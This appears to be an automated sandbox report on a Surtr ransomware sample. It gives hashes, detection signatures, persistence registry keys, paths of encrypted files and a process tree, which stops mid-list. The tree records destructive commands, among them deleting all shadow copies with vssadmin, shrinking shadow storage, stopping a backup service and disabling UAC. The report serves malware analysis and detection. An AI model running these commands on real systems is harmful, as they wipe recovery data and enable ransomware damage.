Analysis
-
max time kernel
121s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-12-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
surtr.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
surtr.exe
Resource
win10-en-20211208
General
-
Target
surtr.exe
-
Size
320KB
-
MD5
e6fc190168519d6a6c4f1519e9450f0f
-
SHA1
af2080ddf1064fb80c7b9af942aaabf264441098
-
SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
-
SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
Malware Config
Extracted
C:\ProgramData\Service\SURTR_README.txt
Extracted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
surtr
Signatures
-
Detects Surtr Payload 2 IoCs
resource yara_rule behavioral2/memory/3680-116-0x0000000140133F50-mapping.dmp family_surtr behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr -
Surtr
Ransomware family first seen in late 2021.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Clears Windows event logs 1 TTPs 64 IoCs
pid Process 4988 wevtutil.exe 2084 Process not Found 4236 wevtutil.exe 4920 wevtutil.exe 264 Process not Found 1224 wevtutil.exe 4184 wevtutil.exe 4916 wevtutil.exe 1252 Process not Found 1216 Process not Found 4556 Process not Found 5032 Process not Found 4360 wevtutil.exe 4984 wevtutil.exe 1964 Process not Found 276 Process not Found 3520 Process not Found 3324 Process not Found 4548 Process not Found 2332 Process not Found 4416 Process not Found 4904 Process not Found 3724 Process not Found 280 wevtutil.exe 4512 wevtutil.exe 1016 Process not Found 4488 wevtutil.exe 5052 Process not Found 4812 Process not Found 5024 Process not Found 4176 Process not Found 2116 Process not Found 5000 wevtutil.exe 3920 Process not Found 592 Process not Found 3864 wevtutil.exe 904 wevtutil.exe 3720 wevtutil.exe 4976 Process not Found 4536 Process not Found 5116 Process not Found 4932 Process not Found 4564 Process not Found 2300 Process not Found 4316 Process not Found 3772 wevtutil.exe 4012 Process not Found 3440 wevtutil.exe 4144 Process not Found 636 Process not Found 4416 Process not Found 1480 Process not Found 5020 wevtutil.exe 1068 wevtutil.exe 4428 wevtutil.exe 3380 Process not Found 932 Process not Found 592 wevtutil.exe 4904 wevtutil.exe 4872 wevtutil.exe 5108 Process not Found 3124 Process not Found 816 Process not Found 4004 Process not Found -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4776 bcdedit.exe 1036 bcdedit.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
resource yara_rule behavioral2/memory/3680-115-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral2/memory/3680-117-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp upx -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt net1.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt net1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe net.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe net.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe" cmd.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: vssadmin.exe File opened (read-only) \??\A: vssadmin.exe File opened (read-only) \??\E: surtr.exe File opened (read-only) \??\L: surtr.exe File opened (read-only) \??\P: surtr.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: surtr.exe File opened (read-only) \??\B: surtr.exe File opened (read-only) \??\Z: vssadmin.exe File opened (read-only) \??\T: vssadmin.exe File opened (read-only) \??\V: vssadmin.exe File opened (read-only) \??\N: vssadmin.exe File opened (read-only) \??\B: vssadmin.exe File opened (read-only) \??\K: surtr.exe File opened (read-only) \??\I: vssadmin.exe File opened (read-only) \??\R: vssadmin.exe File opened (read-only) \??\F: surtr.exe File opened (read-only) \??\I: surtr.exe File opened (read-only) \??\O: surtr.exe File opened (read-only) \??\Q: surtr.exe File opened (read-only) \??\R: surtr.exe File opened (read-only) \??\T: surtr.exe File opened (read-only) \??\Y: vssadmin.exe File opened (read-only) \??\W: vssadmin.exe File opened (read-only) \??\P: vssadmin.exe File opened (read-only) \??\H: surtr.exe File opened (read-only) \??\W: surtr.exe File opened (read-only) \??\S: vssadmin.exe File opened (read-only) \??\L: vssadmin.exe File opened (read-only) \??\Q: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\K: vssadmin.exe File opened (read-only) \??\U: vssadmin.exe File opened (read-only) \??\J: surtr.exe File opened (read-only) \??\N: surtr.exe File opened (read-only) \??\V: surtr.exe File opened (read-only) \??\Z: surtr.exe File opened (read-only) \??\M: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\X: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: surtr.exe File opened (read-only) \??\S: surtr.exe File opened (read-only) \??\U: surtr.exe File opened (read-only) \??\X: surtr.exe File opened (read-only) \??\Y: surtr.exe File opened (read-only) \??\A: surtr.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2668 set thread context of 3680 2668 surtr.exe 69 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ul-oob.xrm-ms.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.EditorRibbon.dll.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\THMBNAIL.PNG.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\BCSRuntimeRes.dll.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Xml.Linq.Resources.dll.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\THMBNAIL.PNG.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt.[[email protected]].SURT surtr.exe File created C:\Program Files\Java\jre1.8.0_66\SURTR_README.hta surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Grace-ppd.xrm-ms.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Common.dll.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\GFX.DLL.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.ELM.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-utility-l1-1-0.dll.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\PROCDB.XLAM.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\ui-strings.js.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected].[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.INF.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ppd.xrm-ms.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-ppd.xrm-ms.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSSOAPR3.DLL.[[email protected]].SURT surtr.exe File created C:\Program Files (x86)\Windows NT\Private_DATA.surt surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_bn.dll.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SFBAPPSDK.DLL.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\WT61ES.LEX.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_sv.dll.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Grace-ppd.xrm-ms.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ro_get.svg.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpResL.dll.mui.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\logger\libconsole_logger_plugin.dll.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark-2x.png.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ul-phn.xrm-ms.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\wordvisi.ttf.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.[[email protected]].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\PortalConnectCore.dll.[[email protected]].SURT surtr.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1304 schtasks.exe 4872 schtasks.exe 2472 Process not Found -
Interacts with shadow copies 2 TTPs 26 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 508 vssadmin.exe 4032 vssadmin.exe 2292 vssadmin.exe 3796 vssadmin.exe 3700 vssadmin.exe 4288 vssadmin.exe 3324 vssadmin.exe 1360 vssadmin.exe 1796 vssadmin.exe 4132 vssadmin.exe 4200 vssadmin.exe 2224 vssadmin.exe 4308 vssadmin.exe 2156 vssadmin.exe 1184 vssadmin.exe 1188 vssadmin.exe 4080 vssadmin.exe 4192 vssadmin.exe 2928 vssadmin.exe 3788 vssadmin.exe 3916 vssadmin.exe 3772 vssadmin.exe 1340 vssadmin.exe 4040 vssadmin.exe 4152 vssadmin.exe 4256 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 984 Process not Found -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3680 surtr.exe 3680 surtr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 2008 vssvc.exe Token: SeRestorePrivilege 2008 vssvc.exe Token: SeAuditPrivilege 2008 vssvc.exe Token: SeSecurityPrivilege 3320 net1.exe Token: SeBackupPrivilege 3320 net1.exe Token: SeSecurityPrivilege 4528 cmd.exe Token: SeBackupPrivilege 4528 cmd.exe Token: SeSecurityPrivilege 2616 wevtutil.exe Token: SeBackupPrivilege 2616 wevtutil.exe Token: SeSecurityPrivilege 3048 wevtutil.exe Token: SeBackupPrivilege 3048 wevtutil.exe Token: SeSecurityPrivilege 4628 cmd.exe Token: SeBackupPrivilege 4628 cmd.exe Token: SeSecurityPrivilege 4608 net.exe Token: SeBackupPrivilege 4608 net.exe Token: SeSecurityPrivilege 4548 net.exe Token: SeBackupPrivilege 4548 net.exe Token: SeSecurityPrivilege 3860 net1.exe Token: SeBackupPrivilege 3860 net1.exe Token: SeSecurityPrivilege 1780 net.exe Token: SeBackupPrivilege 1780 net.exe Token: SeSecurityPrivilege 4180 net.exe Token: SeBackupPrivilege 4180 net.exe Token: SeSecurityPrivilege 5056 net1.exe Token: SeBackupPrivilege 5056 net1.exe Token: SeSecurityPrivilege 2320 net.exe Token: SeBackupPrivilege 2320 net.exe Token: SeSecurityPrivilege 5092 wevtutil.exe Token: SeBackupPrivilege 5092 wevtutil.exe Token: SeSecurityPrivilege 1608 wevtutil.exe Token: SeBackupPrivilege 1608 wevtutil.exe Token: SeSecurityPrivilege 1380 net.exe Token: SeBackupPrivilege 1380 net.exe Token: SeSecurityPrivilege 4812 wevtutil.exe Token: SeBackupPrivilege 4812 wevtutil.exe Token: SeSecurityPrivilege 4892 net.exe Token: SeBackupPrivilege 4892 net.exe Token: SeSecurityPrivilege 3240 net1.exe Token: SeBackupPrivilege 3240 net1.exe Token: SeSecurityPrivilege 284 wevtutil.exe Token: SeBackupPrivilege 284 wevtutil.exe Token: SeSecurityPrivilege 1488 cmd.exe Token: SeBackupPrivilege 1488 cmd.exe Token: SeSecurityPrivilege 4868 wevtutil.exe Token: SeBackupPrivilege 4868 wevtutil.exe Token: SeSecurityPrivilege 3088 net1.exe Token: SeBackupPrivilege 3088 net1.exe Token: SeSecurityPrivilege 3984 net1.exe Token: SeBackupPrivilege 3984 net1.exe Token: SeSecurityPrivilege 4080 wevtutil.exe Token: SeBackupPrivilege 4080 wevtutil.exe Token: SeSecurityPrivilege 4996 wevtutil.exe Token: SeBackupPrivilege 4996 wevtutil.exe Token: SeSecurityPrivilege 4336 wevtutil.exe Token: SeBackupPrivilege 4336 wevtutil.exe Token: SeSecurityPrivilege 4352 net.exe Token: SeBackupPrivilege 4352 net.exe Token: SeSecurityPrivilege 4112 cmd.exe Token: SeBackupPrivilege 4112 cmd.exe Token: SeSecurityPrivilege 3040 wevtutil.exe Token: SeBackupPrivilege 3040 wevtutil.exe Token: SeSecurityPrivilege 4236 wevtutil.exe Token: SeBackupPrivilege 4236 wevtutil.exe Token: SeSecurityPrivilege 4476 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2668 wrote to memory of 3680 2668 surtr.exe 69 PID 2668 wrote to memory of 3680 2668 surtr.exe 69 PID 2668 wrote to memory of 3680 2668 surtr.exe 69 PID 2668 wrote to memory of 3680 2668 surtr.exe 69 PID 2668 wrote to memory of 3680 2668 surtr.exe 69 PID 2668 wrote to memory of 3680 2668 surtr.exe 69 PID 2668 wrote to memory of 3680 2668 surtr.exe 69 PID 3680 wrote to memory of 2332 3680 surtr.exe 70 PID 3680 wrote to memory of 2332 3680 surtr.exe 70 PID 3680 wrote to memory of 4032 3680 surtr.exe 71 PID 3680 wrote to memory of 4032 3680 surtr.exe 71 PID 3680 wrote to memory of 2260 3680 surtr.exe 72 PID 3680 wrote to memory of 2260 3680 surtr.exe 72 PID 2260 wrote to memory of 1184 2260 cmd.exe 73 PID 2260 wrote to memory of 1184 2260 cmd.exe 73 PID 3680 wrote to memory of 772 3680 surtr.exe 76 PID 3680 wrote to memory of 772 3680 surtr.exe 76 PID 3680 wrote to memory of 1520 3680 surtr.exe 75 PID 3680 wrote to memory of 1520 3680 surtr.exe 75 PID 3680 wrote to memory of 1732 3680 surtr.exe 74 PID 3680 wrote to memory of 1732 3680 surtr.exe 74 PID 3680 wrote to memory of 3060 3680 surtr.exe 77 PID 3680 wrote to memory of 3060 3680 surtr.exe 77 PID 3680 wrote to memory of 3744 3680 surtr.exe 78 PID 3680 wrote to memory of 3744 3680 surtr.exe 78 PID 3680 wrote to memory of 3984 3680 surtr.exe 79 PID 3680 wrote to memory of 3984 3680 surtr.exe 79 PID 3680 wrote to memory of 3520 3680 surtr.exe 80 PID 3680 wrote to memory of 3520 3680 surtr.exe 80 PID 3680 wrote to memory of 3920 3680 surtr.exe 81 PID 3680 wrote to memory of 3920 3680 surtr.exe 81 PID 3680 wrote to memory of 3344 3680 surtr.exe 82 PID 3680 wrote to memory of 3344 3680 surtr.exe 82 PID 3680 wrote to memory of 3640 3680 surtr.exe 83 PID 3680 wrote to memory of 3640 3680 surtr.exe 83 PID 3680 wrote to memory of 2772 3680 surtr.exe 85 PID 3680 wrote to memory of 2772 3680 surtr.exe 85 PID 3680 wrote to memory of 1472 3680 surtr.exe 84 PID 3680 wrote to memory of 1472 3680 surtr.exe 84 PID 3680 wrote to memory of 2784 3680 surtr.exe 86 PID 3680 wrote to memory of 2784 3680 surtr.exe 86 PID 3680 wrote to memory of 2600 3680 surtr.exe 87 PID 3680 wrote to memory of 2600 3680 surtr.exe 87 PID 3680 wrote to memory of 1336 3680 surtr.exe 88 PID 3680 wrote to memory of 1336 3680 surtr.exe 88 PID 3680 wrote to memory of 1320 3680 surtr.exe 89 PID 3680 wrote to memory of 1320 3680 surtr.exe 89 PID 3680 wrote to memory of 1616 3680 surtr.exe 90 PID 3680 wrote to memory of 1616 3680 surtr.exe 90 PID 3680 wrote to memory of 664 3680 surtr.exe 91 PID 3680 wrote to memory of 664 3680 surtr.exe 91 PID 3680 wrote to memory of 592 3680 surtr.exe 93 PID 3680 wrote to memory of 592 3680 surtr.exe 93 PID 3680 wrote to memory of 1176 3680 surtr.exe 92 PID 3680 wrote to memory of 1176 3680 surtr.exe 92 PID 3680 wrote to memory of 1264 3680 surtr.exe 94 PID 3680 wrote to memory of 1264 3680 surtr.exe 94 PID 3680 wrote to memory of 2568 3680 surtr.exe 95 PID 3680 wrote to memory of 2568 3680 surtr.exe 95 PID 3680 wrote to memory of 2392 3680 surtr.exe 96 PID 3680 wrote to memory of 2392 3680 surtr.exe 96 PID 3680 wrote to memory of 2552 3680 surtr.exe 97 PID 3680 wrote to memory of 2552 3680 surtr.exe 97 PID 3680 wrote to memory of 1252 3680 surtr.exe 98 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 4176 Process not Found 940 Process not Found 5092 Process not Found 2136 Process not Found 1804 Process not Found 4848 Process not Found 4812 attrib.exe 264 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\surtr.exe"C:\Users\Admin\AppData\Local\Temp\surtr.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\surtr.exe"C:\Users\Admin\AppData\Local\Temp\surtr.exe"2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service3⤵PID:2332
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo off3⤵PID:4032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4373⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\chcp.comchcp 4374⤵PID:1184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB3⤵PID:1732
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB4⤵PID:2456
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4040
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet3⤵PID:1520
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet4⤵PID:3684
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:1796
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"3⤵PID:772
-
C:\Windows\system32\net.exenet stop "Acronis VSS Provider"4⤵PID:344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider"5⤵PID:3968
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵PID:3060
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB4⤵PID:576
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3788
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB3⤵PID:3744
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB4⤵PID:608
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2292
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB3⤵PID:3984
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB4⤵PID:2716
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3324
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB3⤵PID:3520
-
